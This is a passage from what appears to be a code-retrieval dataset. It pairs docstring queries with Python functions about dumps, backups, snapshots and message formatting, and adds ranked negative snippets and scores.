SyncMode.DUMP_REMOTE)", "def mine(self, ship_id, target_id):\n\n # Perfom mining\n mine_string = \"SELECT MINE(\" + str(ship_id) + \",\" + str(target_id) + \");\"\n self.conn_cur.execute(mine_string)\n print(\"[>] Mining ordered\")", "def debug(options, folder, suffix, verbose=True, save_optim=False):\n device = torch.device(options[\"device\"])\n values = torch.randn(1024, device=device)\n\n final_snapshot = save_snapshot(\n os.path.join(folder, f\"blob{suffix}.gz\"),\n values=values.cpu()\n )\n\n # this might help with creeping gpu memory\n gc.collect()\n torch.cuda.set_device(device)\n torch.cuda.empty_cache()\n\n return final_snapshot", "def dumpWithPreobjects(self, preObjects, *obj, **kw):\n\n dis = kw.get(\"dis\")\n try:\n toBeDumped = (preObjects, obj[0] if len(obj) == 1 else obj)\n\n # ensure that the pickler does not touch sys.modules more than required\n with PEP302ImportDetector(raiseOn=kw.get(\"raiseOn\")) as detector:\n sys_modules = dict(sys.modules)\n p = self.pickler.dumps(toBeDumped,\n mangleModuleName=kw.get(\"mangleModuleName\"),\n object_dispatch=kw.get(\"object_dispatch\"))\n sys_modules2 = dict(sys.modules)\n imports = set()\n for n in detector.imports:\n sys_modules2.pop(n, None)\n for i in self.IMPORTS_TO_IGNORE:\n if n.startswith(i):\n break\n else:\n imports.add(n)\n self.assertEqual(sys_modules, sys_modules2)\n self.assertEqual(imports, set())\n\n self.pickler.dis(p, out=StringIO())\n except:\n exinfo = sys.exc_info()\n l = []\n try:\n _sPickle.Pickler(l, 2, object_dispatch=kw.get(\"object_dispatch\")).dump(toBeDumped)\n except Exception:\n try:\n l.append(pickle.STOP)\n pickletools.dis(b\"\".join(l), out=sys.stderr)\n except:\n traceback.print_exc(limit=1, file=sys.stderr)\n raise exinfo[0], exinfo[1], exinfo[2]\n\n if dis is None:\n dis = self.dis\n if dis:\n self.pickler.dis(p)\n print(\"len(pickle): \", len(p))\n return p", "def loadBinsRmsdsFromDumpFile(self):\n bins_rmsds_dump_file = open(self.BINS_RMSDS_DUMP_FNAME , 'r')\n bins_rmsds = pickle.load(bins_rmsds_dump_file)\n bins_rmsds_dump_file.close()\n return bins_rmsds", "def process_archive(self, file):\n self.recursive_archive_depth += 1\n # LOG: write_log or somehow log the archive file here\n if self.recursive_archive_depth >= self.max_recursive_depth:\n file.make_dangerous('Archive bomb')\n else:\n tempdir_path = file.make_tempdir()\n # TODO: double check we are properly escaping file.src_path\n # otherwise we are running unvalidated user input directly in the shell\n command_str = '{} -p1 x \"{}\" -o\"{}\" -bd -aoa'\n unpack_command = command_str.format(SEVENZ_PATH,\n file.src_path, tempdir_path)\n self._run_process(unpack_command)\n self.process_dir(tempdir_path, file.dst_path)\n self.safe_rmtree(tempdir_path)\n self.recursive_archive_depth -= 1", "def run(self):\n type = self.config.get('type', DEFAULT_BACKUP_TYPE)\n backup_dir = self.config.get('backup_dir', self.default_ongoing_backup_dir)\n archive = self.config.get('archive', False)\n only_postprocess = self.config.get('only_postprocess', False)\n compress = self.config.get('compress', False)\n rotate = self.config.get('rotate', False)\n threads = self.config.get('threads', DEFAULT_BACKUP_THREADS)\n\n # find or generate the backup file/dir\n if only_postprocess:\n if self.name.startswith('/'): # if passed an absolute path as section name\n # basedir doesn't work as intended if passed /a/path/like/this/\n backup_dir = os.path.normpath(os.path.join(self.name, '..'))\n self.parse_backup_file()\n else:\n self.find_backup_file(backup_dir)\n if self.file_name is None:\n msg = 'Problem while trying to find the backup files at %s'\n self.logger.error(msg, backup_dir)\n return 10\n else:\n self.generate_file_name(backup_dir)\n\n output_dir = os.path.join(backup_dir, self.dir_name)\n if type == 'dump':\n backup = MyDumperBackup(self.config, self)\n elif type == 'snapshot':\n backup = MariaBackup(self.config, self)\n elif type == 'null':\n backup = NullBackup(self.config, self)\n else:\n self.logger.error('Unrecognized backup format: %s', type)\n return 11\n\n # get the backup command\n if not only_postprocess:\n cmd = backup.get_backup_cmd(backup_dir)\n\n # start status monitoring\n if 'statistics' in self.config: # Enable statistics gathering?\n source = self.config.get('host', 'localhost') + \\\n ':' + \\\n str(self.config.get('port', DEFAULT_PORT))\n stats = DatabaseBackupStatistics(dir_name=self.dir_name, section=self.name,\n type=type, config=self.config.get('statistics'),\n backup_dir=output_dir, source=source)\n else:\n stats = DisabledBackupStatistics()\n\n stats.start()\n\n if not only_postprocess:\n # run backup command\n self.logger.debug(cmd)\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = process.communicate()\n if backup.errors_on_output(out, err):\n stats.fail()\n return 3\n\n # Check log for errors\n if backup.errors_on_log():\n self.logger.error('Error log found at %s', self.log_file)\n stats.fail()\n return 4\n\n # Check medatada file exists and containg the finish date\n if backup.errors_on_metadata(backup_dir):\n self.logger.error('Incorrect metadata file')\n stats.fail()\n return 5\n\n # Backups seems ok, prepare it for recovery and cleanup\n try:\n cmd = backup.get_prepare_cmd(backup_dir)\n except BackupException as ex:\n self.logger.error(str(ex))\n stats.fail()\n return 13\n if cmd != '':\n self.logger.debug(cmd)\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = process.communicate()\n if backup.errors_on_prepare(out, err):\n self.logger.error('The mariabackup prepare process did not complete successfully')\n stats.fail()\n return 6\n\n # get file statistics\n stats.gather_metrics()\n\n if archive:\n backup.archive_databases(output_dir, threads)\n\n if compress:\n # no consolidation per-db, just compress the whole thing\n result = self.tar_and_remove(backup_dir, self.file_name, [self.dir_name, ],\n compression='/usr/bin/pigz -p {}'.format(threads))\n if result != 0:\n self.logger.error('The compression process failed')\n stats.fail()\n return 11\n\n if rotate:\n # perform rotations\n # move the old latest one to the archive, and the current as the latest\n # then delete old backups of the same section, according to the retention\n # config\n result = self.move_backups(self.name, self.default_final_backup_dir,\n self.default_archive_backup_dir, self.name_regex)\n if result != 0:\n self.logger.warning('Archiving backups failed')\n result = self.os_rename(os.path.join(backup_dir, self.file_name),\n os.path.join(self.default_final_backup_dir, self.file_name))\n if result != 0:\n self.logger.error('Moving backup to final dir failed')\n stats.fail()\n return 12\n result = self.purge_backups()\n if result != 0:\n self.logger.warning('Purging old backups failed')\n\n # we are done\n stats.finish()\n return 0", "def memory_snapshot(tag, rank):\n GB = 1024 * 1024 * 1024\n MB = 1024 * 1024\n KB = 1024\n\n peak = dgl.partition.get_peak_mem() * KB\n mem = psutil.virtual_memory()\n avail = mem.available / MB\n used = mem.used / MB\n total = mem.total / MB\n\n mem_string = f\"{total:.0f} (MB) total, {peak:.0f} (MB) peak, {used:.0f} (MB) used, {avail:.0f} (MB) avail\"\n logging.debug(f\"[Rank: {rank} MEMORY_SNAPSHOT] {mem_string} - {tag}\")", "def dump_debug(cid, output_path):\n \n def opath ( dir_name, file_name = None ):\n \"\"\" Takes file_name and returns full path to file in output directory \"\"\"\n if file_name:\n return os.path.join(output_path, dir_name, file_name)\n return os.path.join(output_path, dir_name)\n\n SQL.execute('''\n SELECT \n cables.cid as cid,\n cp.guid as guid,\n cp.port as port,\n cp.hca as hca, \n cables.mtime as mtime,\n cp.flabel as flabel\n FROM \n cables\n INNER JOIN\n cable_ports as cp\n ON\n cables.cid = cp.cid\n WHERE\n cables.cid == ? \n ''',(\n cid,\n ))\n\n ## Node info: Lid 1627\n lidregex = re.compile( r\"\"\"^# Node info: Lid (?P<lid>\\d+)\"\"\") \n\n guids = set()\n sources = set()\n\n nfile.mkdir_p(output_path)\n\n for row in SQL.fetchall(): \n label = hex(int(row['guid']))\n #use smpquery to figure out the lid of the ca\n #r1lead:~ # smpquery nodeinfo -G 0xe41d2d03004bef70 30\n ## Node info: Lid 1627\n #BaseVers:........................1\n #ClassVers:.......................1\n #NodeType:........................Switch\n #NumPorts:........................30\n #SystemGuid:......................0xe41d2d03004bef70\n #Guid:............................0xe41d2d03004bef70\n #PortGuid:........................0xe41d2d03004bef70\n #PartCap:.........................8\n #DevId:...........................0xcb20\n #Revision:........................0x000000a0\n #LocalPort:.......................17\n #VendorId:........................0x0002c9\n\n ret = ib_mgt.exec_opensm_to_string(\"smpquery nodeinfo -G %s %s\" % (int(row['guid']), int(row['port'])), True)\n if not ret:\n vlog(1, 'Unable to query state of %s' % (row['flabel']))\n elif row['guid'] in guids:\n vlog(4, 'Skipping repeat pull of %s' % (row['flabel']))\n else:\n guids.add(row['guid'])\n for node, output in list(ret['output'].items()):\n for out in output:\n match = lidregex.match(out)\n if not match:\n vlog(1, 'Unable to find lid of %s' % (row['flabel']))\n else:\n lid = match.group('lid')\n\n nfile.mkdir_p(opath(label))\n\n if row['hca']:\n vlog(3, 'Skipping HCA %s' % (row['flabel'])) \n else: #switch\n #3 \"mlxdump -d lid-$LID snapshot -m full\" snapshots in a row\n #mellanox asked for 3 dumps every time\n for i in range(1, 4):\n time.sleep(5)\n ib_mgt.exec_opensm_to_file(\n 'cd /var/tmp/; rm -f mlxdump.udmp; date; mlxdump -d lid-%s snapshot -m full 2>&1; mv -v mlxdump.udmp mlxdump.%s.udmp' % (lid, i), \n opath(label, 'mlxdump.%s.log' % (i))\n )\n ib_mgt.pull_opensm_files(opath(label), ' /var/tmp/mlxdump.%s.udmp' % (i) )\n \n #flint -d lid-$LID q \n ib_mgt.exec_opensm_to_file(\n 'flint -d lid-%s q 2>/dev/null' % (lid), \n opath(label, 'flint-query.log')\n )\n\n nfile.write_file(\n opath(label, 'switch-info.txt'),\n 'Switch Name: %s' % row['flabel']\n )\n\n SQL.execute('''\n SELECT \n source\n FROM \n issues \n WHERE\n ignore = 0 and \n cid = ? and\n mtime >= ?\n ORDER BY mtime ASC\n ''', (\n int(row['cid']),\n int(row['mtime']) if row['mtime'] else None,\n ))\n\n for irow in SQL.fetchall():\n src = str(irow['source'])\n if src in sources:\n vlog(4, 'skipping repeat source: %s' % (src))\n else:\n sources.add(src)\n if not os.path.isdir(src):\n vlog(4, 'skipping non-directory source: %s' % (src))\n else:\n p = None\n sp = os.path.split(src)\n if os.path.isdir(sp[1]):\n p = sp[1]\n elif os.path.isdir(sp[0]):\n sp = os.path.split(sp[0])\n p = sp[1]\n\n if not p:\n vlog(4, 'skipping unknown directory source: %s' % (p))\n else:\n cpp = os.path.join(output_path, p)\n if os.path.isdir(cpp):\n vlog(3, 'skipping repeat copying %s -> %s' % (src, cpp))\n else:\n vlog(3, 'Copying %s -> %s' % (src, cpp))\n shutil.copytree(src, cpp, False)", "def _backup_chunk(self, backup, container, data, data_offset,\n object_meta, extra_metadata):\n object_prefix = object_meta['prefix']\n object_list = object_meta['list']\n\n object_id = object_meta['id']\n object_name = '%s-%05d' % (object_prefix, object_id)\n obj = {}\n obj[object_name] = {}\n obj[object_name]['offset'] = data_offset\n obj[object_name]['length'] = len(data)\n LOG.debug('reading chunk of data from volume')\n if self.compressor is not None:\n algorithm = CONF.backup_compression_algorithm.lower()\n obj[object_name]['compression'] = algorithm\n data_size_bytes = len(data)\n data = self.compressor.compress(data)\n comp_size_bytes = len(data)\n LOG.debug('compressed %(data_size_bytes)d bytes of data '\n 'to %(comp_size_bytes)d bytes using '\n '%(algorithm)s',\n {\n 'data_size_bytes': data_size_bytes,\n 'comp_size_bytes': comp_size_bytes,\n 'algorithm': algorithm,\n })\n else:\n LOG.debug('not compressing data')\n obj[object_name]['compression'] = 'none'\n\n LOG.debug('About to put_object')\n write_length_bytes = len(data)\n with self.get_object_writer(\n container, object_name, extra_metadata=extra_metadata\n ) as writer:\n writer.write(data)\n md5 = hashlib.md5(data).hexdigest()\n obj[object_name]['md5'] = md5\n LOG.debug('backup MD5 for %(object_name)s: %(md5)s',\n {'object_name': object_name, 'md5': md5})\n object_list.append(obj)\n object_id += 1\n object_meta['list'] = object_list\n object_meta['id'] = object_id\n\n LOG.debug('Calling eventlet.sleep(0)')\n eventlet.sleep(0)\n return write_length_bytes", "def save_dump_runinfo(self, content):\n if RunInfo.NAME in self._enabled:\n try:\n self._write_dump_runinfo(content)\n except Exception:\n if self.verbose:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n sys.stderr.write(repr(traceback.format_exception(\n exc_type, exc_value, exc_traceback)))\n sys.stderr.write(\"Couldn't save dump run info file. Continuing anyways\\n\")", "def compress_file(map_, name, save_path):\n size = os.path.getsize(save_path)\n temp = subprocess.run([\"gzip\", \"-k\", save_path])\n cr_size = os.path.getsize(save_path+\".gz\")\n try:\n map_[name] = cr_size / size\n except Exception as e:\n print(f\"File: {save_path}, Ori:{size}, Compr:{cr_size}\")\n print(e)\n raise ZeroDivisionError\n temp = subprocess.run([\"rm\", save_path])\n temp = subprocess.run([\"rm\", save_path+\".gz\"])", "def table_dump_query(table_name, path, rows_per_dump):\n return\"\"\"\n DEFINE TEMP-TABLE tt NO-UNDO LIKE %(table_name)s\n FIELD rec_id AS RECID\n FIELD epoch_time AS INT64.\n\n DEFINE VARIABLE epoch AS DATETIME NO-UNDO.\n DEFINE VARIABLE unixTime AS INT64 NO-UNDO.\n DEFINE VARIABLE htt AS HANDLE NO-UNDO.\n DEFINE VARIABLE cFileName AS CHARACTER NO-UNDO FORMAT \"x(60)\".\n DEFINE VARIABLE rowCount as INT64 NO-UNDO.\n\n epoch = DATETIME(1,1,1970,0,0,0,0).\n rowCount = 0.\n\n htt = TEMP-TABLE tt:HANDLE.\n\n FOR EACH platte.%(table_name)s NO-LOCK:\n IF rowCount = %(rows_per_dump)s THEN DO: \n unixTime = interval(NOW, epoch, \"milliseconds\").\n cFileName = \"%(path)s/t__%(table_name)s__e__\" + STRING(unixTime) + \"__insert.json\".\n htt:WRITE-JSON(\"FILE\", cFileName + \"_partial\", TRUE).\n OS-RENAME VALUE(cFileName + \"_partial\") VALUE(cFileName).\n rowCount = 0.\n EMPTY TEMP-TABLE tt.\n END.\n rowCount = rowCount + 1.\n CREATE tt.\n BUFFER-COPY %(table_name)s TO tt.\n tt.rec_id = RECID(%(table_name)s).\n unixTime = interval(NOW, epoch, \"milliseconds\").\n tt.epoch_time = unixTime.\n END.\n unixTime = interval(NOW, epoch, \"milliseconds\").\n cFileName = \"%(path)s/t__%(table_name)s__e__\" + STRING(unixTime) + \"__insert.json\".\n htt:WRITE-JSON(\"FILE\", cFileName + \"_partial\", TRUE).\n OS-RENAME VALUE(cFileName + \"_partial\") VALUE(cFileName)\n \n\"\"\" % {'path': path, 'table_name': table_name, 'rows_per_dump': rows_per_dump}", "def dump(self):\n return self.dump_internal(0)", "def _memtop_exec(options, user_args):\n if options.outfile is None:\n out = sys.stdout\n else:\n out = open(options.outfile, 'w')\n\n tracemalloc.start()\n\n _load_and_exec(options.file[0], user_args)\n\n snapshot = tracemalloc.take_snapshot()\n display_top(snapshot, limit=options.limit, file=out)" ]
[ "0.57792044", "0.53705996", "0.52849925", "0.52743363", "0.5234966", "0.518306", "0.51442665", "0.5070806", "0.5030404", "0.49894577", "0.49146363", "0.49089596", "0.48556525", "0.4828357", "0.48120502", "0.47813582", "0.47782636", "0.4737786", "0.46923456", "0.46380943", "0.45736268", "0.45575222", "0.45132217", "0.44417477", "0.44284102", "0.44216308", "0.43894592", "0.43817386", "0.43554786", "0.4351797", "0.43509188", "0.43259507", "0.43185276", "0.43182284", "0.4292699", "0.42853492", "0.4277114", "0.42729318", "0.4269674", "0.42662752", "0.42653263", "0.42591435", "0.4259126", "0.42518935", "0.42490065", "0.42364892", "0.42182", "0.4214153", "0.42076373", "0.4199573", "0.41981727", "0.41972795", "0.41947934", "0.4190577", "0.41778344", "0.41763642", "0.4168309", "0.414741", "0.41455507", "0.41277447", "0.41259193", "0.41242337", "0.41188654", "0.4118542", "0.41100022", "0.4102148", "0.41011882", "0.40933144", "0.4092863", "0.40916318", "0.40869227", "0.4084554", "0.4083968", "0.40823478", "0.40687293", "0.40660238", "0.4057902", "0.4057625", "0.4056693", "0.40503973", "0.40456283", "0.40246454", "0.40237874", "0.40178362", "0.40178344", "0.40169936", "0.40160328", "0.40160197", "0.40155613", "0.40109476", "0.4010749", "0.40032333", "0.40005428", "0.39905077", "0.39895844", "0.39805958", "0.39766383", "0.39738563", "0.39707148", "0.39674202" ]
0.6442122
0
Make sure message is formatted correctly.
def test_setting_failure(self): with mock.patch.object(ip_lib, 'set_ip_nonlocal_bind', return_value=1): ip_lib.set_ip_nonlocal_bind_for_namespace('foo', value=1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def format(self, message):", "def _formatMessage(self, msg, standardMsg):\r\n if not self.longMessage:\r\n return msg or standardMsg\r\n if msg is None:\r\n return standardMsg\r\n try:\r\n return '%s : %s' % (standardMsg, msg)\r\n except UnicodeDecodeError:\r\n return '%s : %s' % (safe_str(standardMsg), safe_str(msg))", "def check_message(self, msg):\n pass", "def validate_message(self, state_id, msg):\n pass", "def _formatMessage(msg, standardMsg):\n if msg is None:\n return standardMsg\n try:\n # don't switch to '{}' formatting in Python 2.X\n # it changes the way unicode input is handled\n return '%s : %s' % (standardMsg, msg)\n except UnicodeDecodeError:\n return '%s : %s' % (repr(standardMsg), repr(msg))", "def __ensure_error_message_restriction_compliance(full_message):\n message_size_limit = Constants.STATUS_ERROR_MSG_SIZE_LIMIT_IN_CHARACTERS\n formatted_message = re.sub(r\"\\s+\", \" \", str(full_message))\n return formatted_message[:message_size_limit-3] + '...' if len(formatted_message) > message_size_limit else formatted_message", "def test_msg_generation(self):\n try:\n record_str = generate_json_message()\n except (Exception, ValueError) as error:\n print(error)\n assert(False)\n assert(validate_record_format(record_str))", "def horde_message(self, message):", "def __format_message(message, as_json=False):\n formatted_message = None\n if as_json:\n formatted_message = json_format.MessageToJson(message, sort_keys=True)\n else:\n formatted_message = text_format.MessageToString(message)\n return formatted_message", "def message_check(self, message):\n if(message == \"\"):\n return False\n\n if(len(message) > 256):\n return False\n\n return True", "def check_message(self):\n def check(fld_key):\n if not self[fld_key]:\n string = self._fields[fld_key].string\n raise UserError(\n _(\"%s field required to send an email.\") % string)\n if self.email_type == 'general':\n check('subject')\n check('body')\n elif self.email_type == 'scheduled':\n check('date')\n check('duration')\n check('priority')\n check('sub_subject')\n check('mail_template_id')", "def parse_message(self, message):\n pass", "def _validate_input(self):\n\n if is_empty(self.message) == True:\n raise ValidationException(\"Message cannont be empty.\")", "def test_buoy_format1():\n with pytest.raises(AssertionError) as err_info:\n Check_BuoyDC.check_buoy_format(buoy_format_fail_1)\n assert str(err_info.value) == 'Input formatted incorrectly, see instructions'", "def validate_format(self):\n raise NotImplementedError()", "def _test_parts(self):\n\n message = []\n\n if self._year is None:\n message.append(\"No year\")\n else:\n try:\n int(self._year)\n except:\n message.append(\"Bad year {}\".format(self._year))\n\n if not self._release:\n message.append(\"No release\")\n else:\n try:\n assert (int(self._release) in [1, 5])\n except:\n message.append(\"Bad release {}\".format(self._release))\n\n if not self._state:\n message.append(\"No state\")\n elif len(self._state) != 2:\n message.append(\"Bad state {}\".format(self._state))\n\n if not self._record_type:\n message.append(\"No record_type\")\n else:\n try:\n assert(self._record_type.upper()[0] in ['H','P'])\n except:\n message.append(\"Bad record type {}\".format(self._record_type))\n\n return message", "def test_format_log_message(self, log_message):\n token = Token(\"NDY3MjIzMjMwNjUwNzc3NjQx\", \"XsySD_\", \"s45jqDV_Iisn-symw0yDRrk_jf4\")\n log_message.format.return_value = \"Howdy\"\n\n return_value = TokenRemover.format_log_message(self.msg, token)\n\n self.assertEqual(return_value, log_message.format.return_value)\n log_message.format.assert_called_once_with(\n author=self.msg.author,\n author_id=self.msg.author.id,\n channel=self.msg.channel.mention,\n user_id=token.user_id,\n timestamp=token.timestamp,\n hmac=\"x\" * len(token.hmac),\n )", "def getMessage() -> str:\n pass", "def handle_message(self, validated_message: dict):\n pass", "def fmt(message):\n return \"---------- \" + message + \" ----------\"", "def _FormatMessage(self, message):\n script_name = os.path.basename(sys.argv[0])\n timestamp = datetime.now().isoformat()\n formatted_message = '[{0:s}] {1:s}: {2:s} - {3:s}\\n'.format(\n timestamp, script_name, self._sender, message)\n return formatted_message", "def test_incorrect_format_1(self):\n changelog = changelog_temp.format(\n before_changelog=\"## [Not yet released]\\n\\n### Added\\n\\n- Added a new feature\\n\"\n )\n with pytest.raises(ValueError):\n parse_changelog(changelog)", "def validate_new_message(payload):\n serialized_message = json.loads(payload)\n message = Message.make(serialized_message)\n print(\"Message ({0}) contents: {1}\".format(message.type, message))\n return message", "def test_message_roundtrip(self):\n with open(MESSAGES_LOG_FILE, \"rb\") as fd:\n for line in fd:\n timestamp, msg_data = line.split(b\",\", 1)\n assert msg_data.endswith(b\"\\r\\n\")\n msg = message.fromString(msg_data)\n recovered_msg_data = message.toString(msg)\n\n # Ideally, I would like to be able to check msg_data agsint\n # the recovered_msg_data but because of string stripping this\n # is not possible.\n # self.assertEqual(recovered_msg_data, msg_data)\n\n # Therefore convert the recovered string back into a message\n # object and compare that.\n recovered_msg = message.fromString(recovered_msg_data)\n self.assertEqual(recovered_msg, msg)", "def _check_whitespace_formatting(self, docstring: PetscDocStringImpl) -> None:\n format_diag = self.diags.formatting\n base_mess = f'{self.transform(self.name)} values must be (1) space away from colon not ({{}})'\n for (line, line_after_colon), sub_items in self.items:\n colon_idx = line.find(':')\n if colon_idx < 0:\n continue\n\n correct_offset = colon_idx + 2\n rest_idx = line.find(line_after_colon)\n if rest_idx == correct_offset:\n continue\n\n nspaces = rest_idx - correct_offset\n if rest_idx > correct_offset:\n sub = ' ' * nspaces\n offset = correct_offset\n fix = ''\n else:\n sub = ':'\n offset = colon_idx\n fix = ': '\n floc = docstring.make_source_range(sub, line, sub_items[0][0].start.line, offset=offset)\n docstring.add_diagnostic_from_source_range(\n Diagnostic.Kind.ERROR, format_diag, base_mess.format(nspaces + 1), floc, patch=Patch(floc, fix)\n )\n return", "def consolidate_messages(self, msg):", "def lint_commit_message(commit):\n success = True\n lines = commit.message.splitlines()\n\n # Check length of summary line.\n summary_line_len = len(lines[0])\n if summary_line_len > COMMIT_MSG_MAX_SUMMARY_LEN:\n error(\n \"The summary line in the commit message is %d characters long; \"\n \"only %d characters are allowed.\" %\n (summary_line_len, COMMIT_MSG_MAX_SUMMARY_LEN), commit)\n success = False\n\n # Check that summary line does not end with a period\n if lines[0].endswith('.'):\n error(\"The summary line must not end with a period.\", commit)\n success = False\n\n # Check that we don't have any fixups.\n if lines[0].startswith('fixup!'):\n error(\"Fixup commits are not allowed. Please resolve by rebasing.\",\n commit)\n success = False\n\n # Try to determine whether we got an area prefix in the commit message:\n summary_line_split = lines[0].split(':')\n summary_line_split_len = len(summary_line_split)\n\n # We didn't get an area prefix, so just make sure the message started with a\n # capital letter.\n if summary_line_split_len == 1:\n if not re.match(r'[A-Z]', lines[0]):\n error(\"The summary line must start with a capital letter.\", commit)\n success = False\n # The user specified an area on which she worked.\n elif summary_line_split_len == 2:\n if not re.match(r'[a-z_A-Z\\-]*(/[a-z_A-Z\\-]+)*', summary_line_split[0]):\n error(\n 'The area specifier is mal-formed. Only letters,'\n 'underscores and hyphens are allowed. Different areas must be'\n 'separated by a slash.', commit)\n success = False\n # Check the second part of the commit message.\n if not summary_line_split[1].startswith(' '):\n error(\"The area must be separated by a single space.\", commit)\n success = False\n if not re.match(r'\\s[A-Z]', summary_line_split[1]):\n error(\n \"The summary line after the colon must start with a capital letter.\",\n commit)\n success = False\n # We do not allow more than one area i.e., colon.\n else:\n error(\"Only one colon is allowed to specify the area of changes.\",\n commit)\n success = False\n\n # Check for an empty line separating the summary line from the long\n # description.\n if len(lines) > 1 and lines[1] != \"\":\n error(\n \"The second line of a commit message must be empty, as it \"\n \"separates the summary from the long description.\", commit)\n success = False\n\n return success", "def _format_message_cee(message):\n try:\n meniscus_sd = message['_SDATA']['meniscus']\n tenant_id = meniscus_sd['tenant']\n message_token = meniscus_sd['token']\n\n #if there is a key error then the syslog message did\n #not contain necessary credential information\n except KeyError:\n error_message = 'tenant_id or message token not provided'\n _LOG.debug('Message validation failed: {0}'.format(error_message))\n raise errors.MessageValidationError(error_message)\n\n # format to CEE\n cee_message = dict()\n\n cee_message['time'] = message.get('ISODATE', '-')\n cee_message['host'] = message.get('HOST', '-')\n cee_message['pname'] = message.get('PROGRAM', '-')\n cee_message['pri'] = message.get('PRIORITY', '-')\n cee_message['ver'] = message.get('VERSION', \"1\")\n cee_message['pid'] = message.get('PID', '-')\n cee_message['msgid'] = message.get('MSGID', '-')\n cee_message['msg'] = message.get('MESSAGE', '-')\n cee_message['native'] = message.get('_SDATA', {})\n\n #send the new cee_message to be validated\n _validate_token_from_cache(tenant_id, message_token, cee_message)", "def can_message_formatter(msg, include_hashtag=False, include_spaces=False):\n\n # This is how obd_conn would handle the formatting. Remove the following 2 lines to allow both spaces and hashtags\n if include_hashtag:\n include_spaces=False\n\n # Data\n data_hex = binascii.hexlify(msg.data)\n if include_spaces:\n data_string = \" \".join(data_hex[i:i+2] for i in range(0, len(data_hex), 2))\n else:\n data_string = data_hex\n\n # Seperator\n seperator_string = \"#\" if include_hashtag else \"\"\n if include_spaces:\n seperator_string = \" \" + seperator_string + (\" \" if include_hashtag else \"\")\n\n # Header\n header_string = (\"{:08x}\" if msg.is_extended_id else \"{:02x}\").format(msg.arbitration_id)\n\n # Return value\n return header_string + seperator_string + data_string", "def test_sendMessageInvalidCommand(self):\n error = self.assertRaises(\n ValueError, self.p.sendMessage, \" \", \"param1\", \"param2\"\n )\n self.assertEqual(\n str(error),\n \"Somebody screwed up, 'cuz this doesn't look like a command to \" \"me: \",\n )", "def _check_message(self, _message_contents):\r\n if not type(_message_contents) is dict:\r\n self.logger.error(\"Message should be a dict.\")\r\n return False\r\n if not \"event\" in _message_contents:\r\n self.logger.error(\"Message dict has no event key.\")\r\n return False\r\n if not \"data\" in _message_contents:\r\n self.logger.error(\"Message dict has no data key.\")\r\n return False\r\n if not type(_message_contents[\"event\"]) == str:\r\n self.logger.error(\"Message event is not a string.\")\r\n return False\r\n if len(_message_contents[\"event\"]) == 0:\r\n self.logger.error(\"Message event cannot be empty.\")\r\n return False\r\n if not type(_message_contents[\"data\"]) == list:\r\n self.logger.error(\"Message data is not a list.\")\r\n return False\r\n if len(_message_contents[\"data\"]) == 0:\r\n self.logger.error(\"Message data cannot be empty list.\")\r\n return False\r\n return True", "def test_buoy_format2():\n with pytest.raises(AssertionError) as err_info:\n Check_BuoyDC.check_buoy_format(buoy_format_fail_2)\n assert str(err_info.value) == 'Input length incorrect, see instructions'", "def format_msg(msg):\n if type(msg) == str:\n msg = msg.encode()\n header = str(len(msg))\n header = header.zfill(HEADER_SIZE)\n return header.encode(), msg", "def email_rfc2822_compliance(message, max_line_length=900):\n returnmsg = \"\"\n while len(message) > 0:\n returnmsg = returnmsg + message[:max_line_length] + \"\\r\\n\"\n message = message[max_line_length:]\n\n return returnmsg", "def format(self, message):\n\t\tif type(self.protocol[0]).__name__ == \"Raw\":\n\t\t\treturn self.name + \":\" + message\n\t\treturn message", "def verify_raw_message(self, msg: bytes):\n if not (MIN_MESSAGE_SIZE < len(msg) < MAX_MESSAGE_SIZE):\n raise ValueError(\"Invalid message size!\")\n\n msg_type = get_message_type(msg) # yields a ValueError on invalid type\n msg_sender = get_message_sender(msg) # yields a ValueError if sender is invalid\n msg_round = get_message_round(msg)\n\n if msg_round < self.round:\n raise ValueError(f\"Message to late\")\n\n if msg_round == self.round:\n if msg_type == MessageType.Propose and self.phase > Phase.Propose:\n raise ValueError(f\"Message to late!\")\n if msg_type == MessageType.Acknowledge and self.phase > Phase.Acknowledge:\n if not self.is_leader:\n raise ValueError(f\"Message to late!\")\n elif self.is_leader and msg_type != MessageType.Confirm:\n raise ValueError(\"Leaders only process Confirm messages for current round!\")\n\n if self.node_status[msg_sender] == NodeStatus.ADVERSARIAL:\n return ValueError(\"Message sender is an adversary!\")\n\n # TODO: Drop message if some message of the same (type, round, sender)-combination\n # was previously added to the queue.\n\n # Drop messages with invalid signatures\n if not ed25519.verify_attached(msg, NODE_INFOS[msg_sender].public_key):\n return ValueError(\"Signature check failed!\")\n\n return True", "def getMessage():\n return message", "def test_parse_score_msg(self):\r\n\r\n assessment = self.openendedmodule._parse_score_msg(\"{}\", self.test_system)\r\n self.assertEqual(assessment.get(\"valid\"), False)", "def _parse_message(self, exc):\n return '%s: %s' % (exc.__class__.__name__, str(exc))", "def assertAssemblesTo(self, formatted, expectedFormatted):\n text = irc.assembleFormattedText(formatted)\n expectedText = irc.assembleFormattedText(expectedFormatted)\n self.assertEqual(\n irc.assembleFormattedText(formatted),\n expectedText,\n \"%r (%r) is not equivalent to %r (%r)\"\n % (text, formatted, expectedText, expectedFormatted),\n )", "def format(self, kwmsg):\n return kwmsg[\"msg\"]", "def test_compose_email2_good(self):\n pass", "def clean_message_md(self):\n message_md = self.cleaned_data[\"message_md\"]\n lines = filter(None, message_md.splitlines())\n message_md = \" \".join(lines)\n return message_md", "def setUp(self):\n self.single_rfh2_message = open(\n os.path.join(self.messages_dir, \"single_rfh2.dat\"), \"rb\").read()\n self.single_rfh2_message_not_well_formed = \\\n self.single_rfh2_message[0:117] + self.single_rfh2_message[121:]", "def check_commit_msg(commitish):\n\n hdr = CommitSubHeader()\n line_list = dump_raw_body(commitish)\n\n if COMMIT_MESSAGE_CHECK and line_list[1] != \"\":\n if line_list[1].find('REF: ') == -1:\n add_error(\"Summary field must have just one line in %s\" % commitish)\n else:\n add_error(\"No empty line after Summary field in %s\" % commitish)\n\n if COMMIT_MESSAGE_CHECK and len(line_list[0]) < 5 or len(line_list[0]) > 78:\n add_error(\"Wrong size (%d) of Summary field in %s\" % (len(line_list[0]), commitish))\n\n while len(line_list) != 0:\n line = line_list.pop(0)\n\n if line.find('REF: ') == 0:\n if hdr.ref == None:\n hdr.ref = 1 # Not None\n elif COMMIT_MESSAGE_CHECK:\n 